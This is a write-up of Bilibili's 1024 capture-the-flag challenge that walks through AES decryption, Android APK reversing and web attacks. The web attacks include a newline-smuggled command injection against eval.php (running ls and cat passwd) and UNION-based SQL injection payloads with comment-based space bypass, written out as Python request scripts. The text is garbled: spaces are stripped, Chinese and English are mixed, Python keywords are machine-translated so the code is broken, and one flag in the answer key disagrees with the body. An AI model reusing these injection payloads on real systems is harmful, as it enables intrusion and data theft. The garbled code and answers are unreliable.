参考第一题答案:a1cd5f84-27966146-3776f301-64031bb9第二题:36c7a7b4-cda04af0-8db0368d-b5166480第三题:9d3c3014-6c6267e5-086aaee1f18452aQuestion4:3d5dd579-0678ef93-18b70cae-cabc5d51Question5:516834cc-50e448af-bcf9ed53-9ae4328eQuestion6:b13981f4-5ae996d4-bc04be5b-34662a78Question7(partialIP,10pointsforbba.ja).cca.beg,bba.ja.ccb.cbc,bbb.bb.bjd.bgc,bbb.bb.bjd.bha,bbb.bb.bjd.bhc,bbb.bb.bjd.bhf,bfh.ff.dj.bcf,bfh.ff.dj.bd,bfh.ff.dj.fb,bfh.ff.dj.ig,bfh.ff.dj.jf,cd.baf.cae.cbc,cd.bb.cai.cbh,cdd.bcc.bg.bib,cde.ced.bbb.dd,dc.bb.ii.jj,jj.bdc.bbb.cc最近看到哔哩哔哩推出了1024程序员节活动,里面有技术大赛,分为算法与安全答题和安全攻防挑战。安全攻防挑战共有7题,包括APP逆向和解密。作为一名爬虫工程师,逆向分析能力也是必不可少的。是的,所以K哥从一个爬虫工程师的角度,尝试做了两道逆向工程相关的题,发现逆向工程并不难,所以想和大家分享一下自己的想法。(以爬虫工程师的角度分析安全攻防问题,互联网安全高手勿喷!部分解题思路来自互联网安全专家)部分网络安全问题请参考互联网第一思路安全专家:https://xingye.me/?p=3891024程序员节活动地址:https://www.bilibili.com/blackboard/20211024.html安全攻防挑战地址:https://security.bilibili.com/sec1024/问题一:加密解密第一题给出了一串密文,没有任何提示。作为一名爬虫工程师,K哥熟练地打开了F12,翻看了源码。这里有一个form表单,method="post",还有一个id是成功的div标签,所以一开始怀疑是不是密文被解密,发送了POST请求,然后div下面会显示flag标记成功的ID?灵机一动,K哥熟练的翻了一遍JS代码,因为我们爬虫遇到最多的就是JS加密,然后发现加载了jQuery和一个common.js文件,不管是搜索标签什么的,都有没有什么有用的信息。SincethereisnoJSencryption,itshouldbeaharddecryptedtext.Observethatthisistwo48-bitciphertexts,oritmaybea96-bitciphertext,andtherearenospecialsymbolssuchas==,soitisimpossibletobeThesimplestMD5,butBrotherKstilltriedit,splititintosix16-bit,three32-bitandothercombinations,andfoundthatitwasnotMD5,sohetriedavarietyofencryptionalgorithms,oneastheKEY,oneasthepasswordText,ortheentireparagraphcombinedintociphertext,SHA,HMAC,RC4andotheralgorithmswillnotwork,andthencarefullyobservethewebpage,BrotherKwondersifthishappy_1024_2233isalsopartoftheencryption?Willitbethesaltvalue(IVvalue,alsocalledoffset)?CoulditbetheKEY?结果多种尝试,最终才得出结论:加密方式:AES加密加密模式:ECB填充方式:无影响,都可以Key:happy_1024_223396位密文:e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156输出方式:Hex(十六进制)解密结果(flag):a1cd5f84-27966146-3776f301-64031bb9Fortheprinciplesandimplementationofvariousencryptionalgorithms,youcanrefertoBrotherK’spreviousarticles:[CrawlerKnowledge]Commonencryptionanddecryptionalgorithmsforcrawlers.cda04af0-8db0368d-b5166480,justinthecommentsonthehome.vuepage,asshowninthefigurebelow:Question3:ThebestlanguageThethirdquestionsaysthatPHPisthebestlanguageintheworld,andaneval.phpisgiven,suchasAsshowninthepicture:Theideaof??solvingthisquestioncomesfromthebigguyofInternetsecurity.Downloadeval.php,andyoucanseetheregularpattern/^\w+$/.Thiscanbematchedwithanewlinecharacterattheend,andthenyoucanusetheLinuxcommandtochangetheline:useCommandlsintherootdirectory,andsendaGETrequesttohttp://security.bilibili.com/...[]=1%0a&args[]=ls:importrequestsurl="http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=ls"response=requests.get(url=url)print(response.text)返回内容:1.txtpasswddataconfigflag在passwd中,其他忽略,所以直接使用linux命令catpasswd到http://security.bilibili.com/...[]=1%0a&args[]=cat&args[]=passwd发送GET请求:importrequestsurl="http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=cat&args[]=passwd"响应=requests.get(url=url)print(response.text)returnsflag:9d3c3014-6c6267e7-086aaee5-1f18452a问题4:SQL注入同理,找到网页上的按钮,点击日志信息,可以看到日志请求,你可以从日志api入手,抓包日志api为:https://security.bilibili.com/sec1024/q/admin/api/v1/log/list,尝试绕过空格过滤和回显,Python发送POST:(PS:注意每次请求user_name字段的变化)"","user_name":"1/**/union/**/select/**/database(),user(),3,4,5","action":"","page":1,"size":20}response=requests.post(url=url,json=json_data)print(response.text)返回内容:{"code":200,"data“:{“res_list”:[{"action":"4","id":"q","time":"5","user_id":"test@10.34.12.128","user_name":"3"}],"total":1},"msg":""}获取表名:importrequestsurl="https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"json_data={"user_id":"","user_name":"1/**/union/**/select/**/database(),user(),3,4,group_concat(table_name)/**/from/**/information_schema.表/**/where/**/table_schema=database()#","action":"","page":1,"size":20}response=requests.post(url=url,json=json_data)print(response.text)返回内容,可以得到flag、log、user:{"code":200,"data":{"res_list":[{"action":"4","id":"q","time":"flag,log,user","user_id":"test@10.34.12.128","user_name":"3"}],"total":1},"msg":""}获取flag表的字段,使用16进制绕过,因为不能使用引号,flag16进制为666c6167:importrequestsurl="https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"json_data={"user_id":"","user_name":"1/**/union/**/select/**/数据库(),用户(),3,4,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name=0x666c6167#","action":"","page":1,"size":20}response=requests.post(url=url,json=json_data)print(response.text)返回内容即可得到一个字段,id:{"code":200,"data":{"res_list":[{"action":"4","id":"q","time":"id","user_id":"test@10.34.12.128","user_name":"3"}],"total":1},"msg":""}最后直接拿flag:importrequestsurl="https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"json_data={"user_id":"","user_name":"1/**/union/**/select/**/database(),user(),3,4,group_concat(id)/**/from/**/flag#","action":"","page":1,"size":20}response=requests.post(url=url,json=json_data)print(response.文本)返回内容3d5dd579-0678ef93-18b70cae-cabc5d51作为标志:{“code”:200,“data”:{“res_list”:[{“action”:“4”,“id”:“q”,“time":"3d5dd579-0678ef93-18b70cae-cabc5d51","user_id":"test@10.34.12.128","user_name":"3"}],"total":1},"msg":""}第五题:APP逆向第五题是一道Android逆向题,如图:扔到模拟器里看,大概是输入账号密码,错了会提示“一点点~”~”,如果它是正确的,你应该能够得到它的标记把apk直接丢进JADX里看,没有混淆,代码一目了然,尤其这个Encrypt最显眼:分析代码:在MainActivity.java中,输入账号密码,赋值给obj和obj2,然后调用加密中的方法。BitXOR3运算和base64编码,然后用Arrays.equals方法将处理后的账号密码和正确的账号密码进行比较,如果正确则输出bilibili-(?-?)つロ干杯~,不是很复杂,可以用Java复现,也可以用Python反推正确的账号密码。使用Python复现时,注意以Java二字节数组的形式给出正确的账号密码。Python中没有字节数组这样的东西。从概念上讲,Python和Java字节的取值范围也不一样,Python3是0~256,Java是-127~128,所以注意转换的时候需要移动256位,Python推导完整代码如下:导入base64byte_arr1=[78,106,73,49,79,122,65,51,89,71,65,117,78,106,78,109,78,122,99,55,89,109,85,61]byte_arr2=[89,87,66,108,79,109,90,110,78,106,65,117,79,109,74,109,78,122,65,120,79,50,89,61]byte_arr1_=bytes(b%256forbinbyte_arr1)byte_arr2_=bytes(b%256forbinbyte_arr2)bs64_arr1=base64.b64decode(byte_arr1_)bs64_arr2=base64.b64decode(byte_arr2_)username=password=""foriinrange(len(bs64_arr1)):username+=chr(bs64_arr1[i]^3)foriinrange(len(bs64_arr2)):password+=chr(bs64_arr2[i]^3)print("username:",username)print("password:",password)print("flag:",username+"-"+password)输出:用户名:516834cc-50e448afpassword:bcf9ed53-9ae4328eflag:516834cc-50e448af-bcf9ed53-9ae4328e在模拟器APP中输入账号密码,测试成功:第6题:IDAReverseSO第5题和第6题一样,只是flags不同。第六题需要逆向SO,会验证abi和系统版本,将build.prop、ro.product.cpu.abi改为x86,ro.build.version.release改为9,然后创建/data/2233,4字节一该组将成为flag:b13981f4-5ae996d4-bc04be5b-34662a78问题7:风控恶意IP最后一题是找出所有恶意IP,用逗号分隔成字符串提交。计算正确数量的IP的分数。我不知道如何判断这个问题。K哥尝试用Python提取所有IP,放到Excel中,找出重复次数过多的IP:bba.ja.cca.beg,bba.ja.ccb.cbc,bbb.bb.bjd.bgc,bbb.bb.bjd.bha,bbb.bb.bjd.bhc,bbb.bb.bjd.bhf,bfh.ff.dj.bcf,bfh.ff.dj.bd,bfh.ff.dj.fb,bfh.ff.dj.ig,bfh.ff.dj.jf,cd.baf.cae.cbc,cd.bb.cai.cbh,cdd.bcc.bg.bib,cde.ced.bbb.dd,dc.bb.ii.jj,jj.bdc.bbb.cc这个答案只给10分,其实只要有一个正确答案就是10分,满分是20分,可能有错也有少,这道题绝对是没那么简单,还得用其他的判断方法,比如判断UA,Path,Referer,同一个UA不同IP的多次访问等等,有想法的可以大佬们可以评论说说总结部分,题目比较简单,但是没有hint。和第一题一样,需要精通各种加密算法,才能快速推断出加密方式,否则只能一一尝试,剩下的这道题需要一定的网络安全知识,各位爬虫也可以试试它。
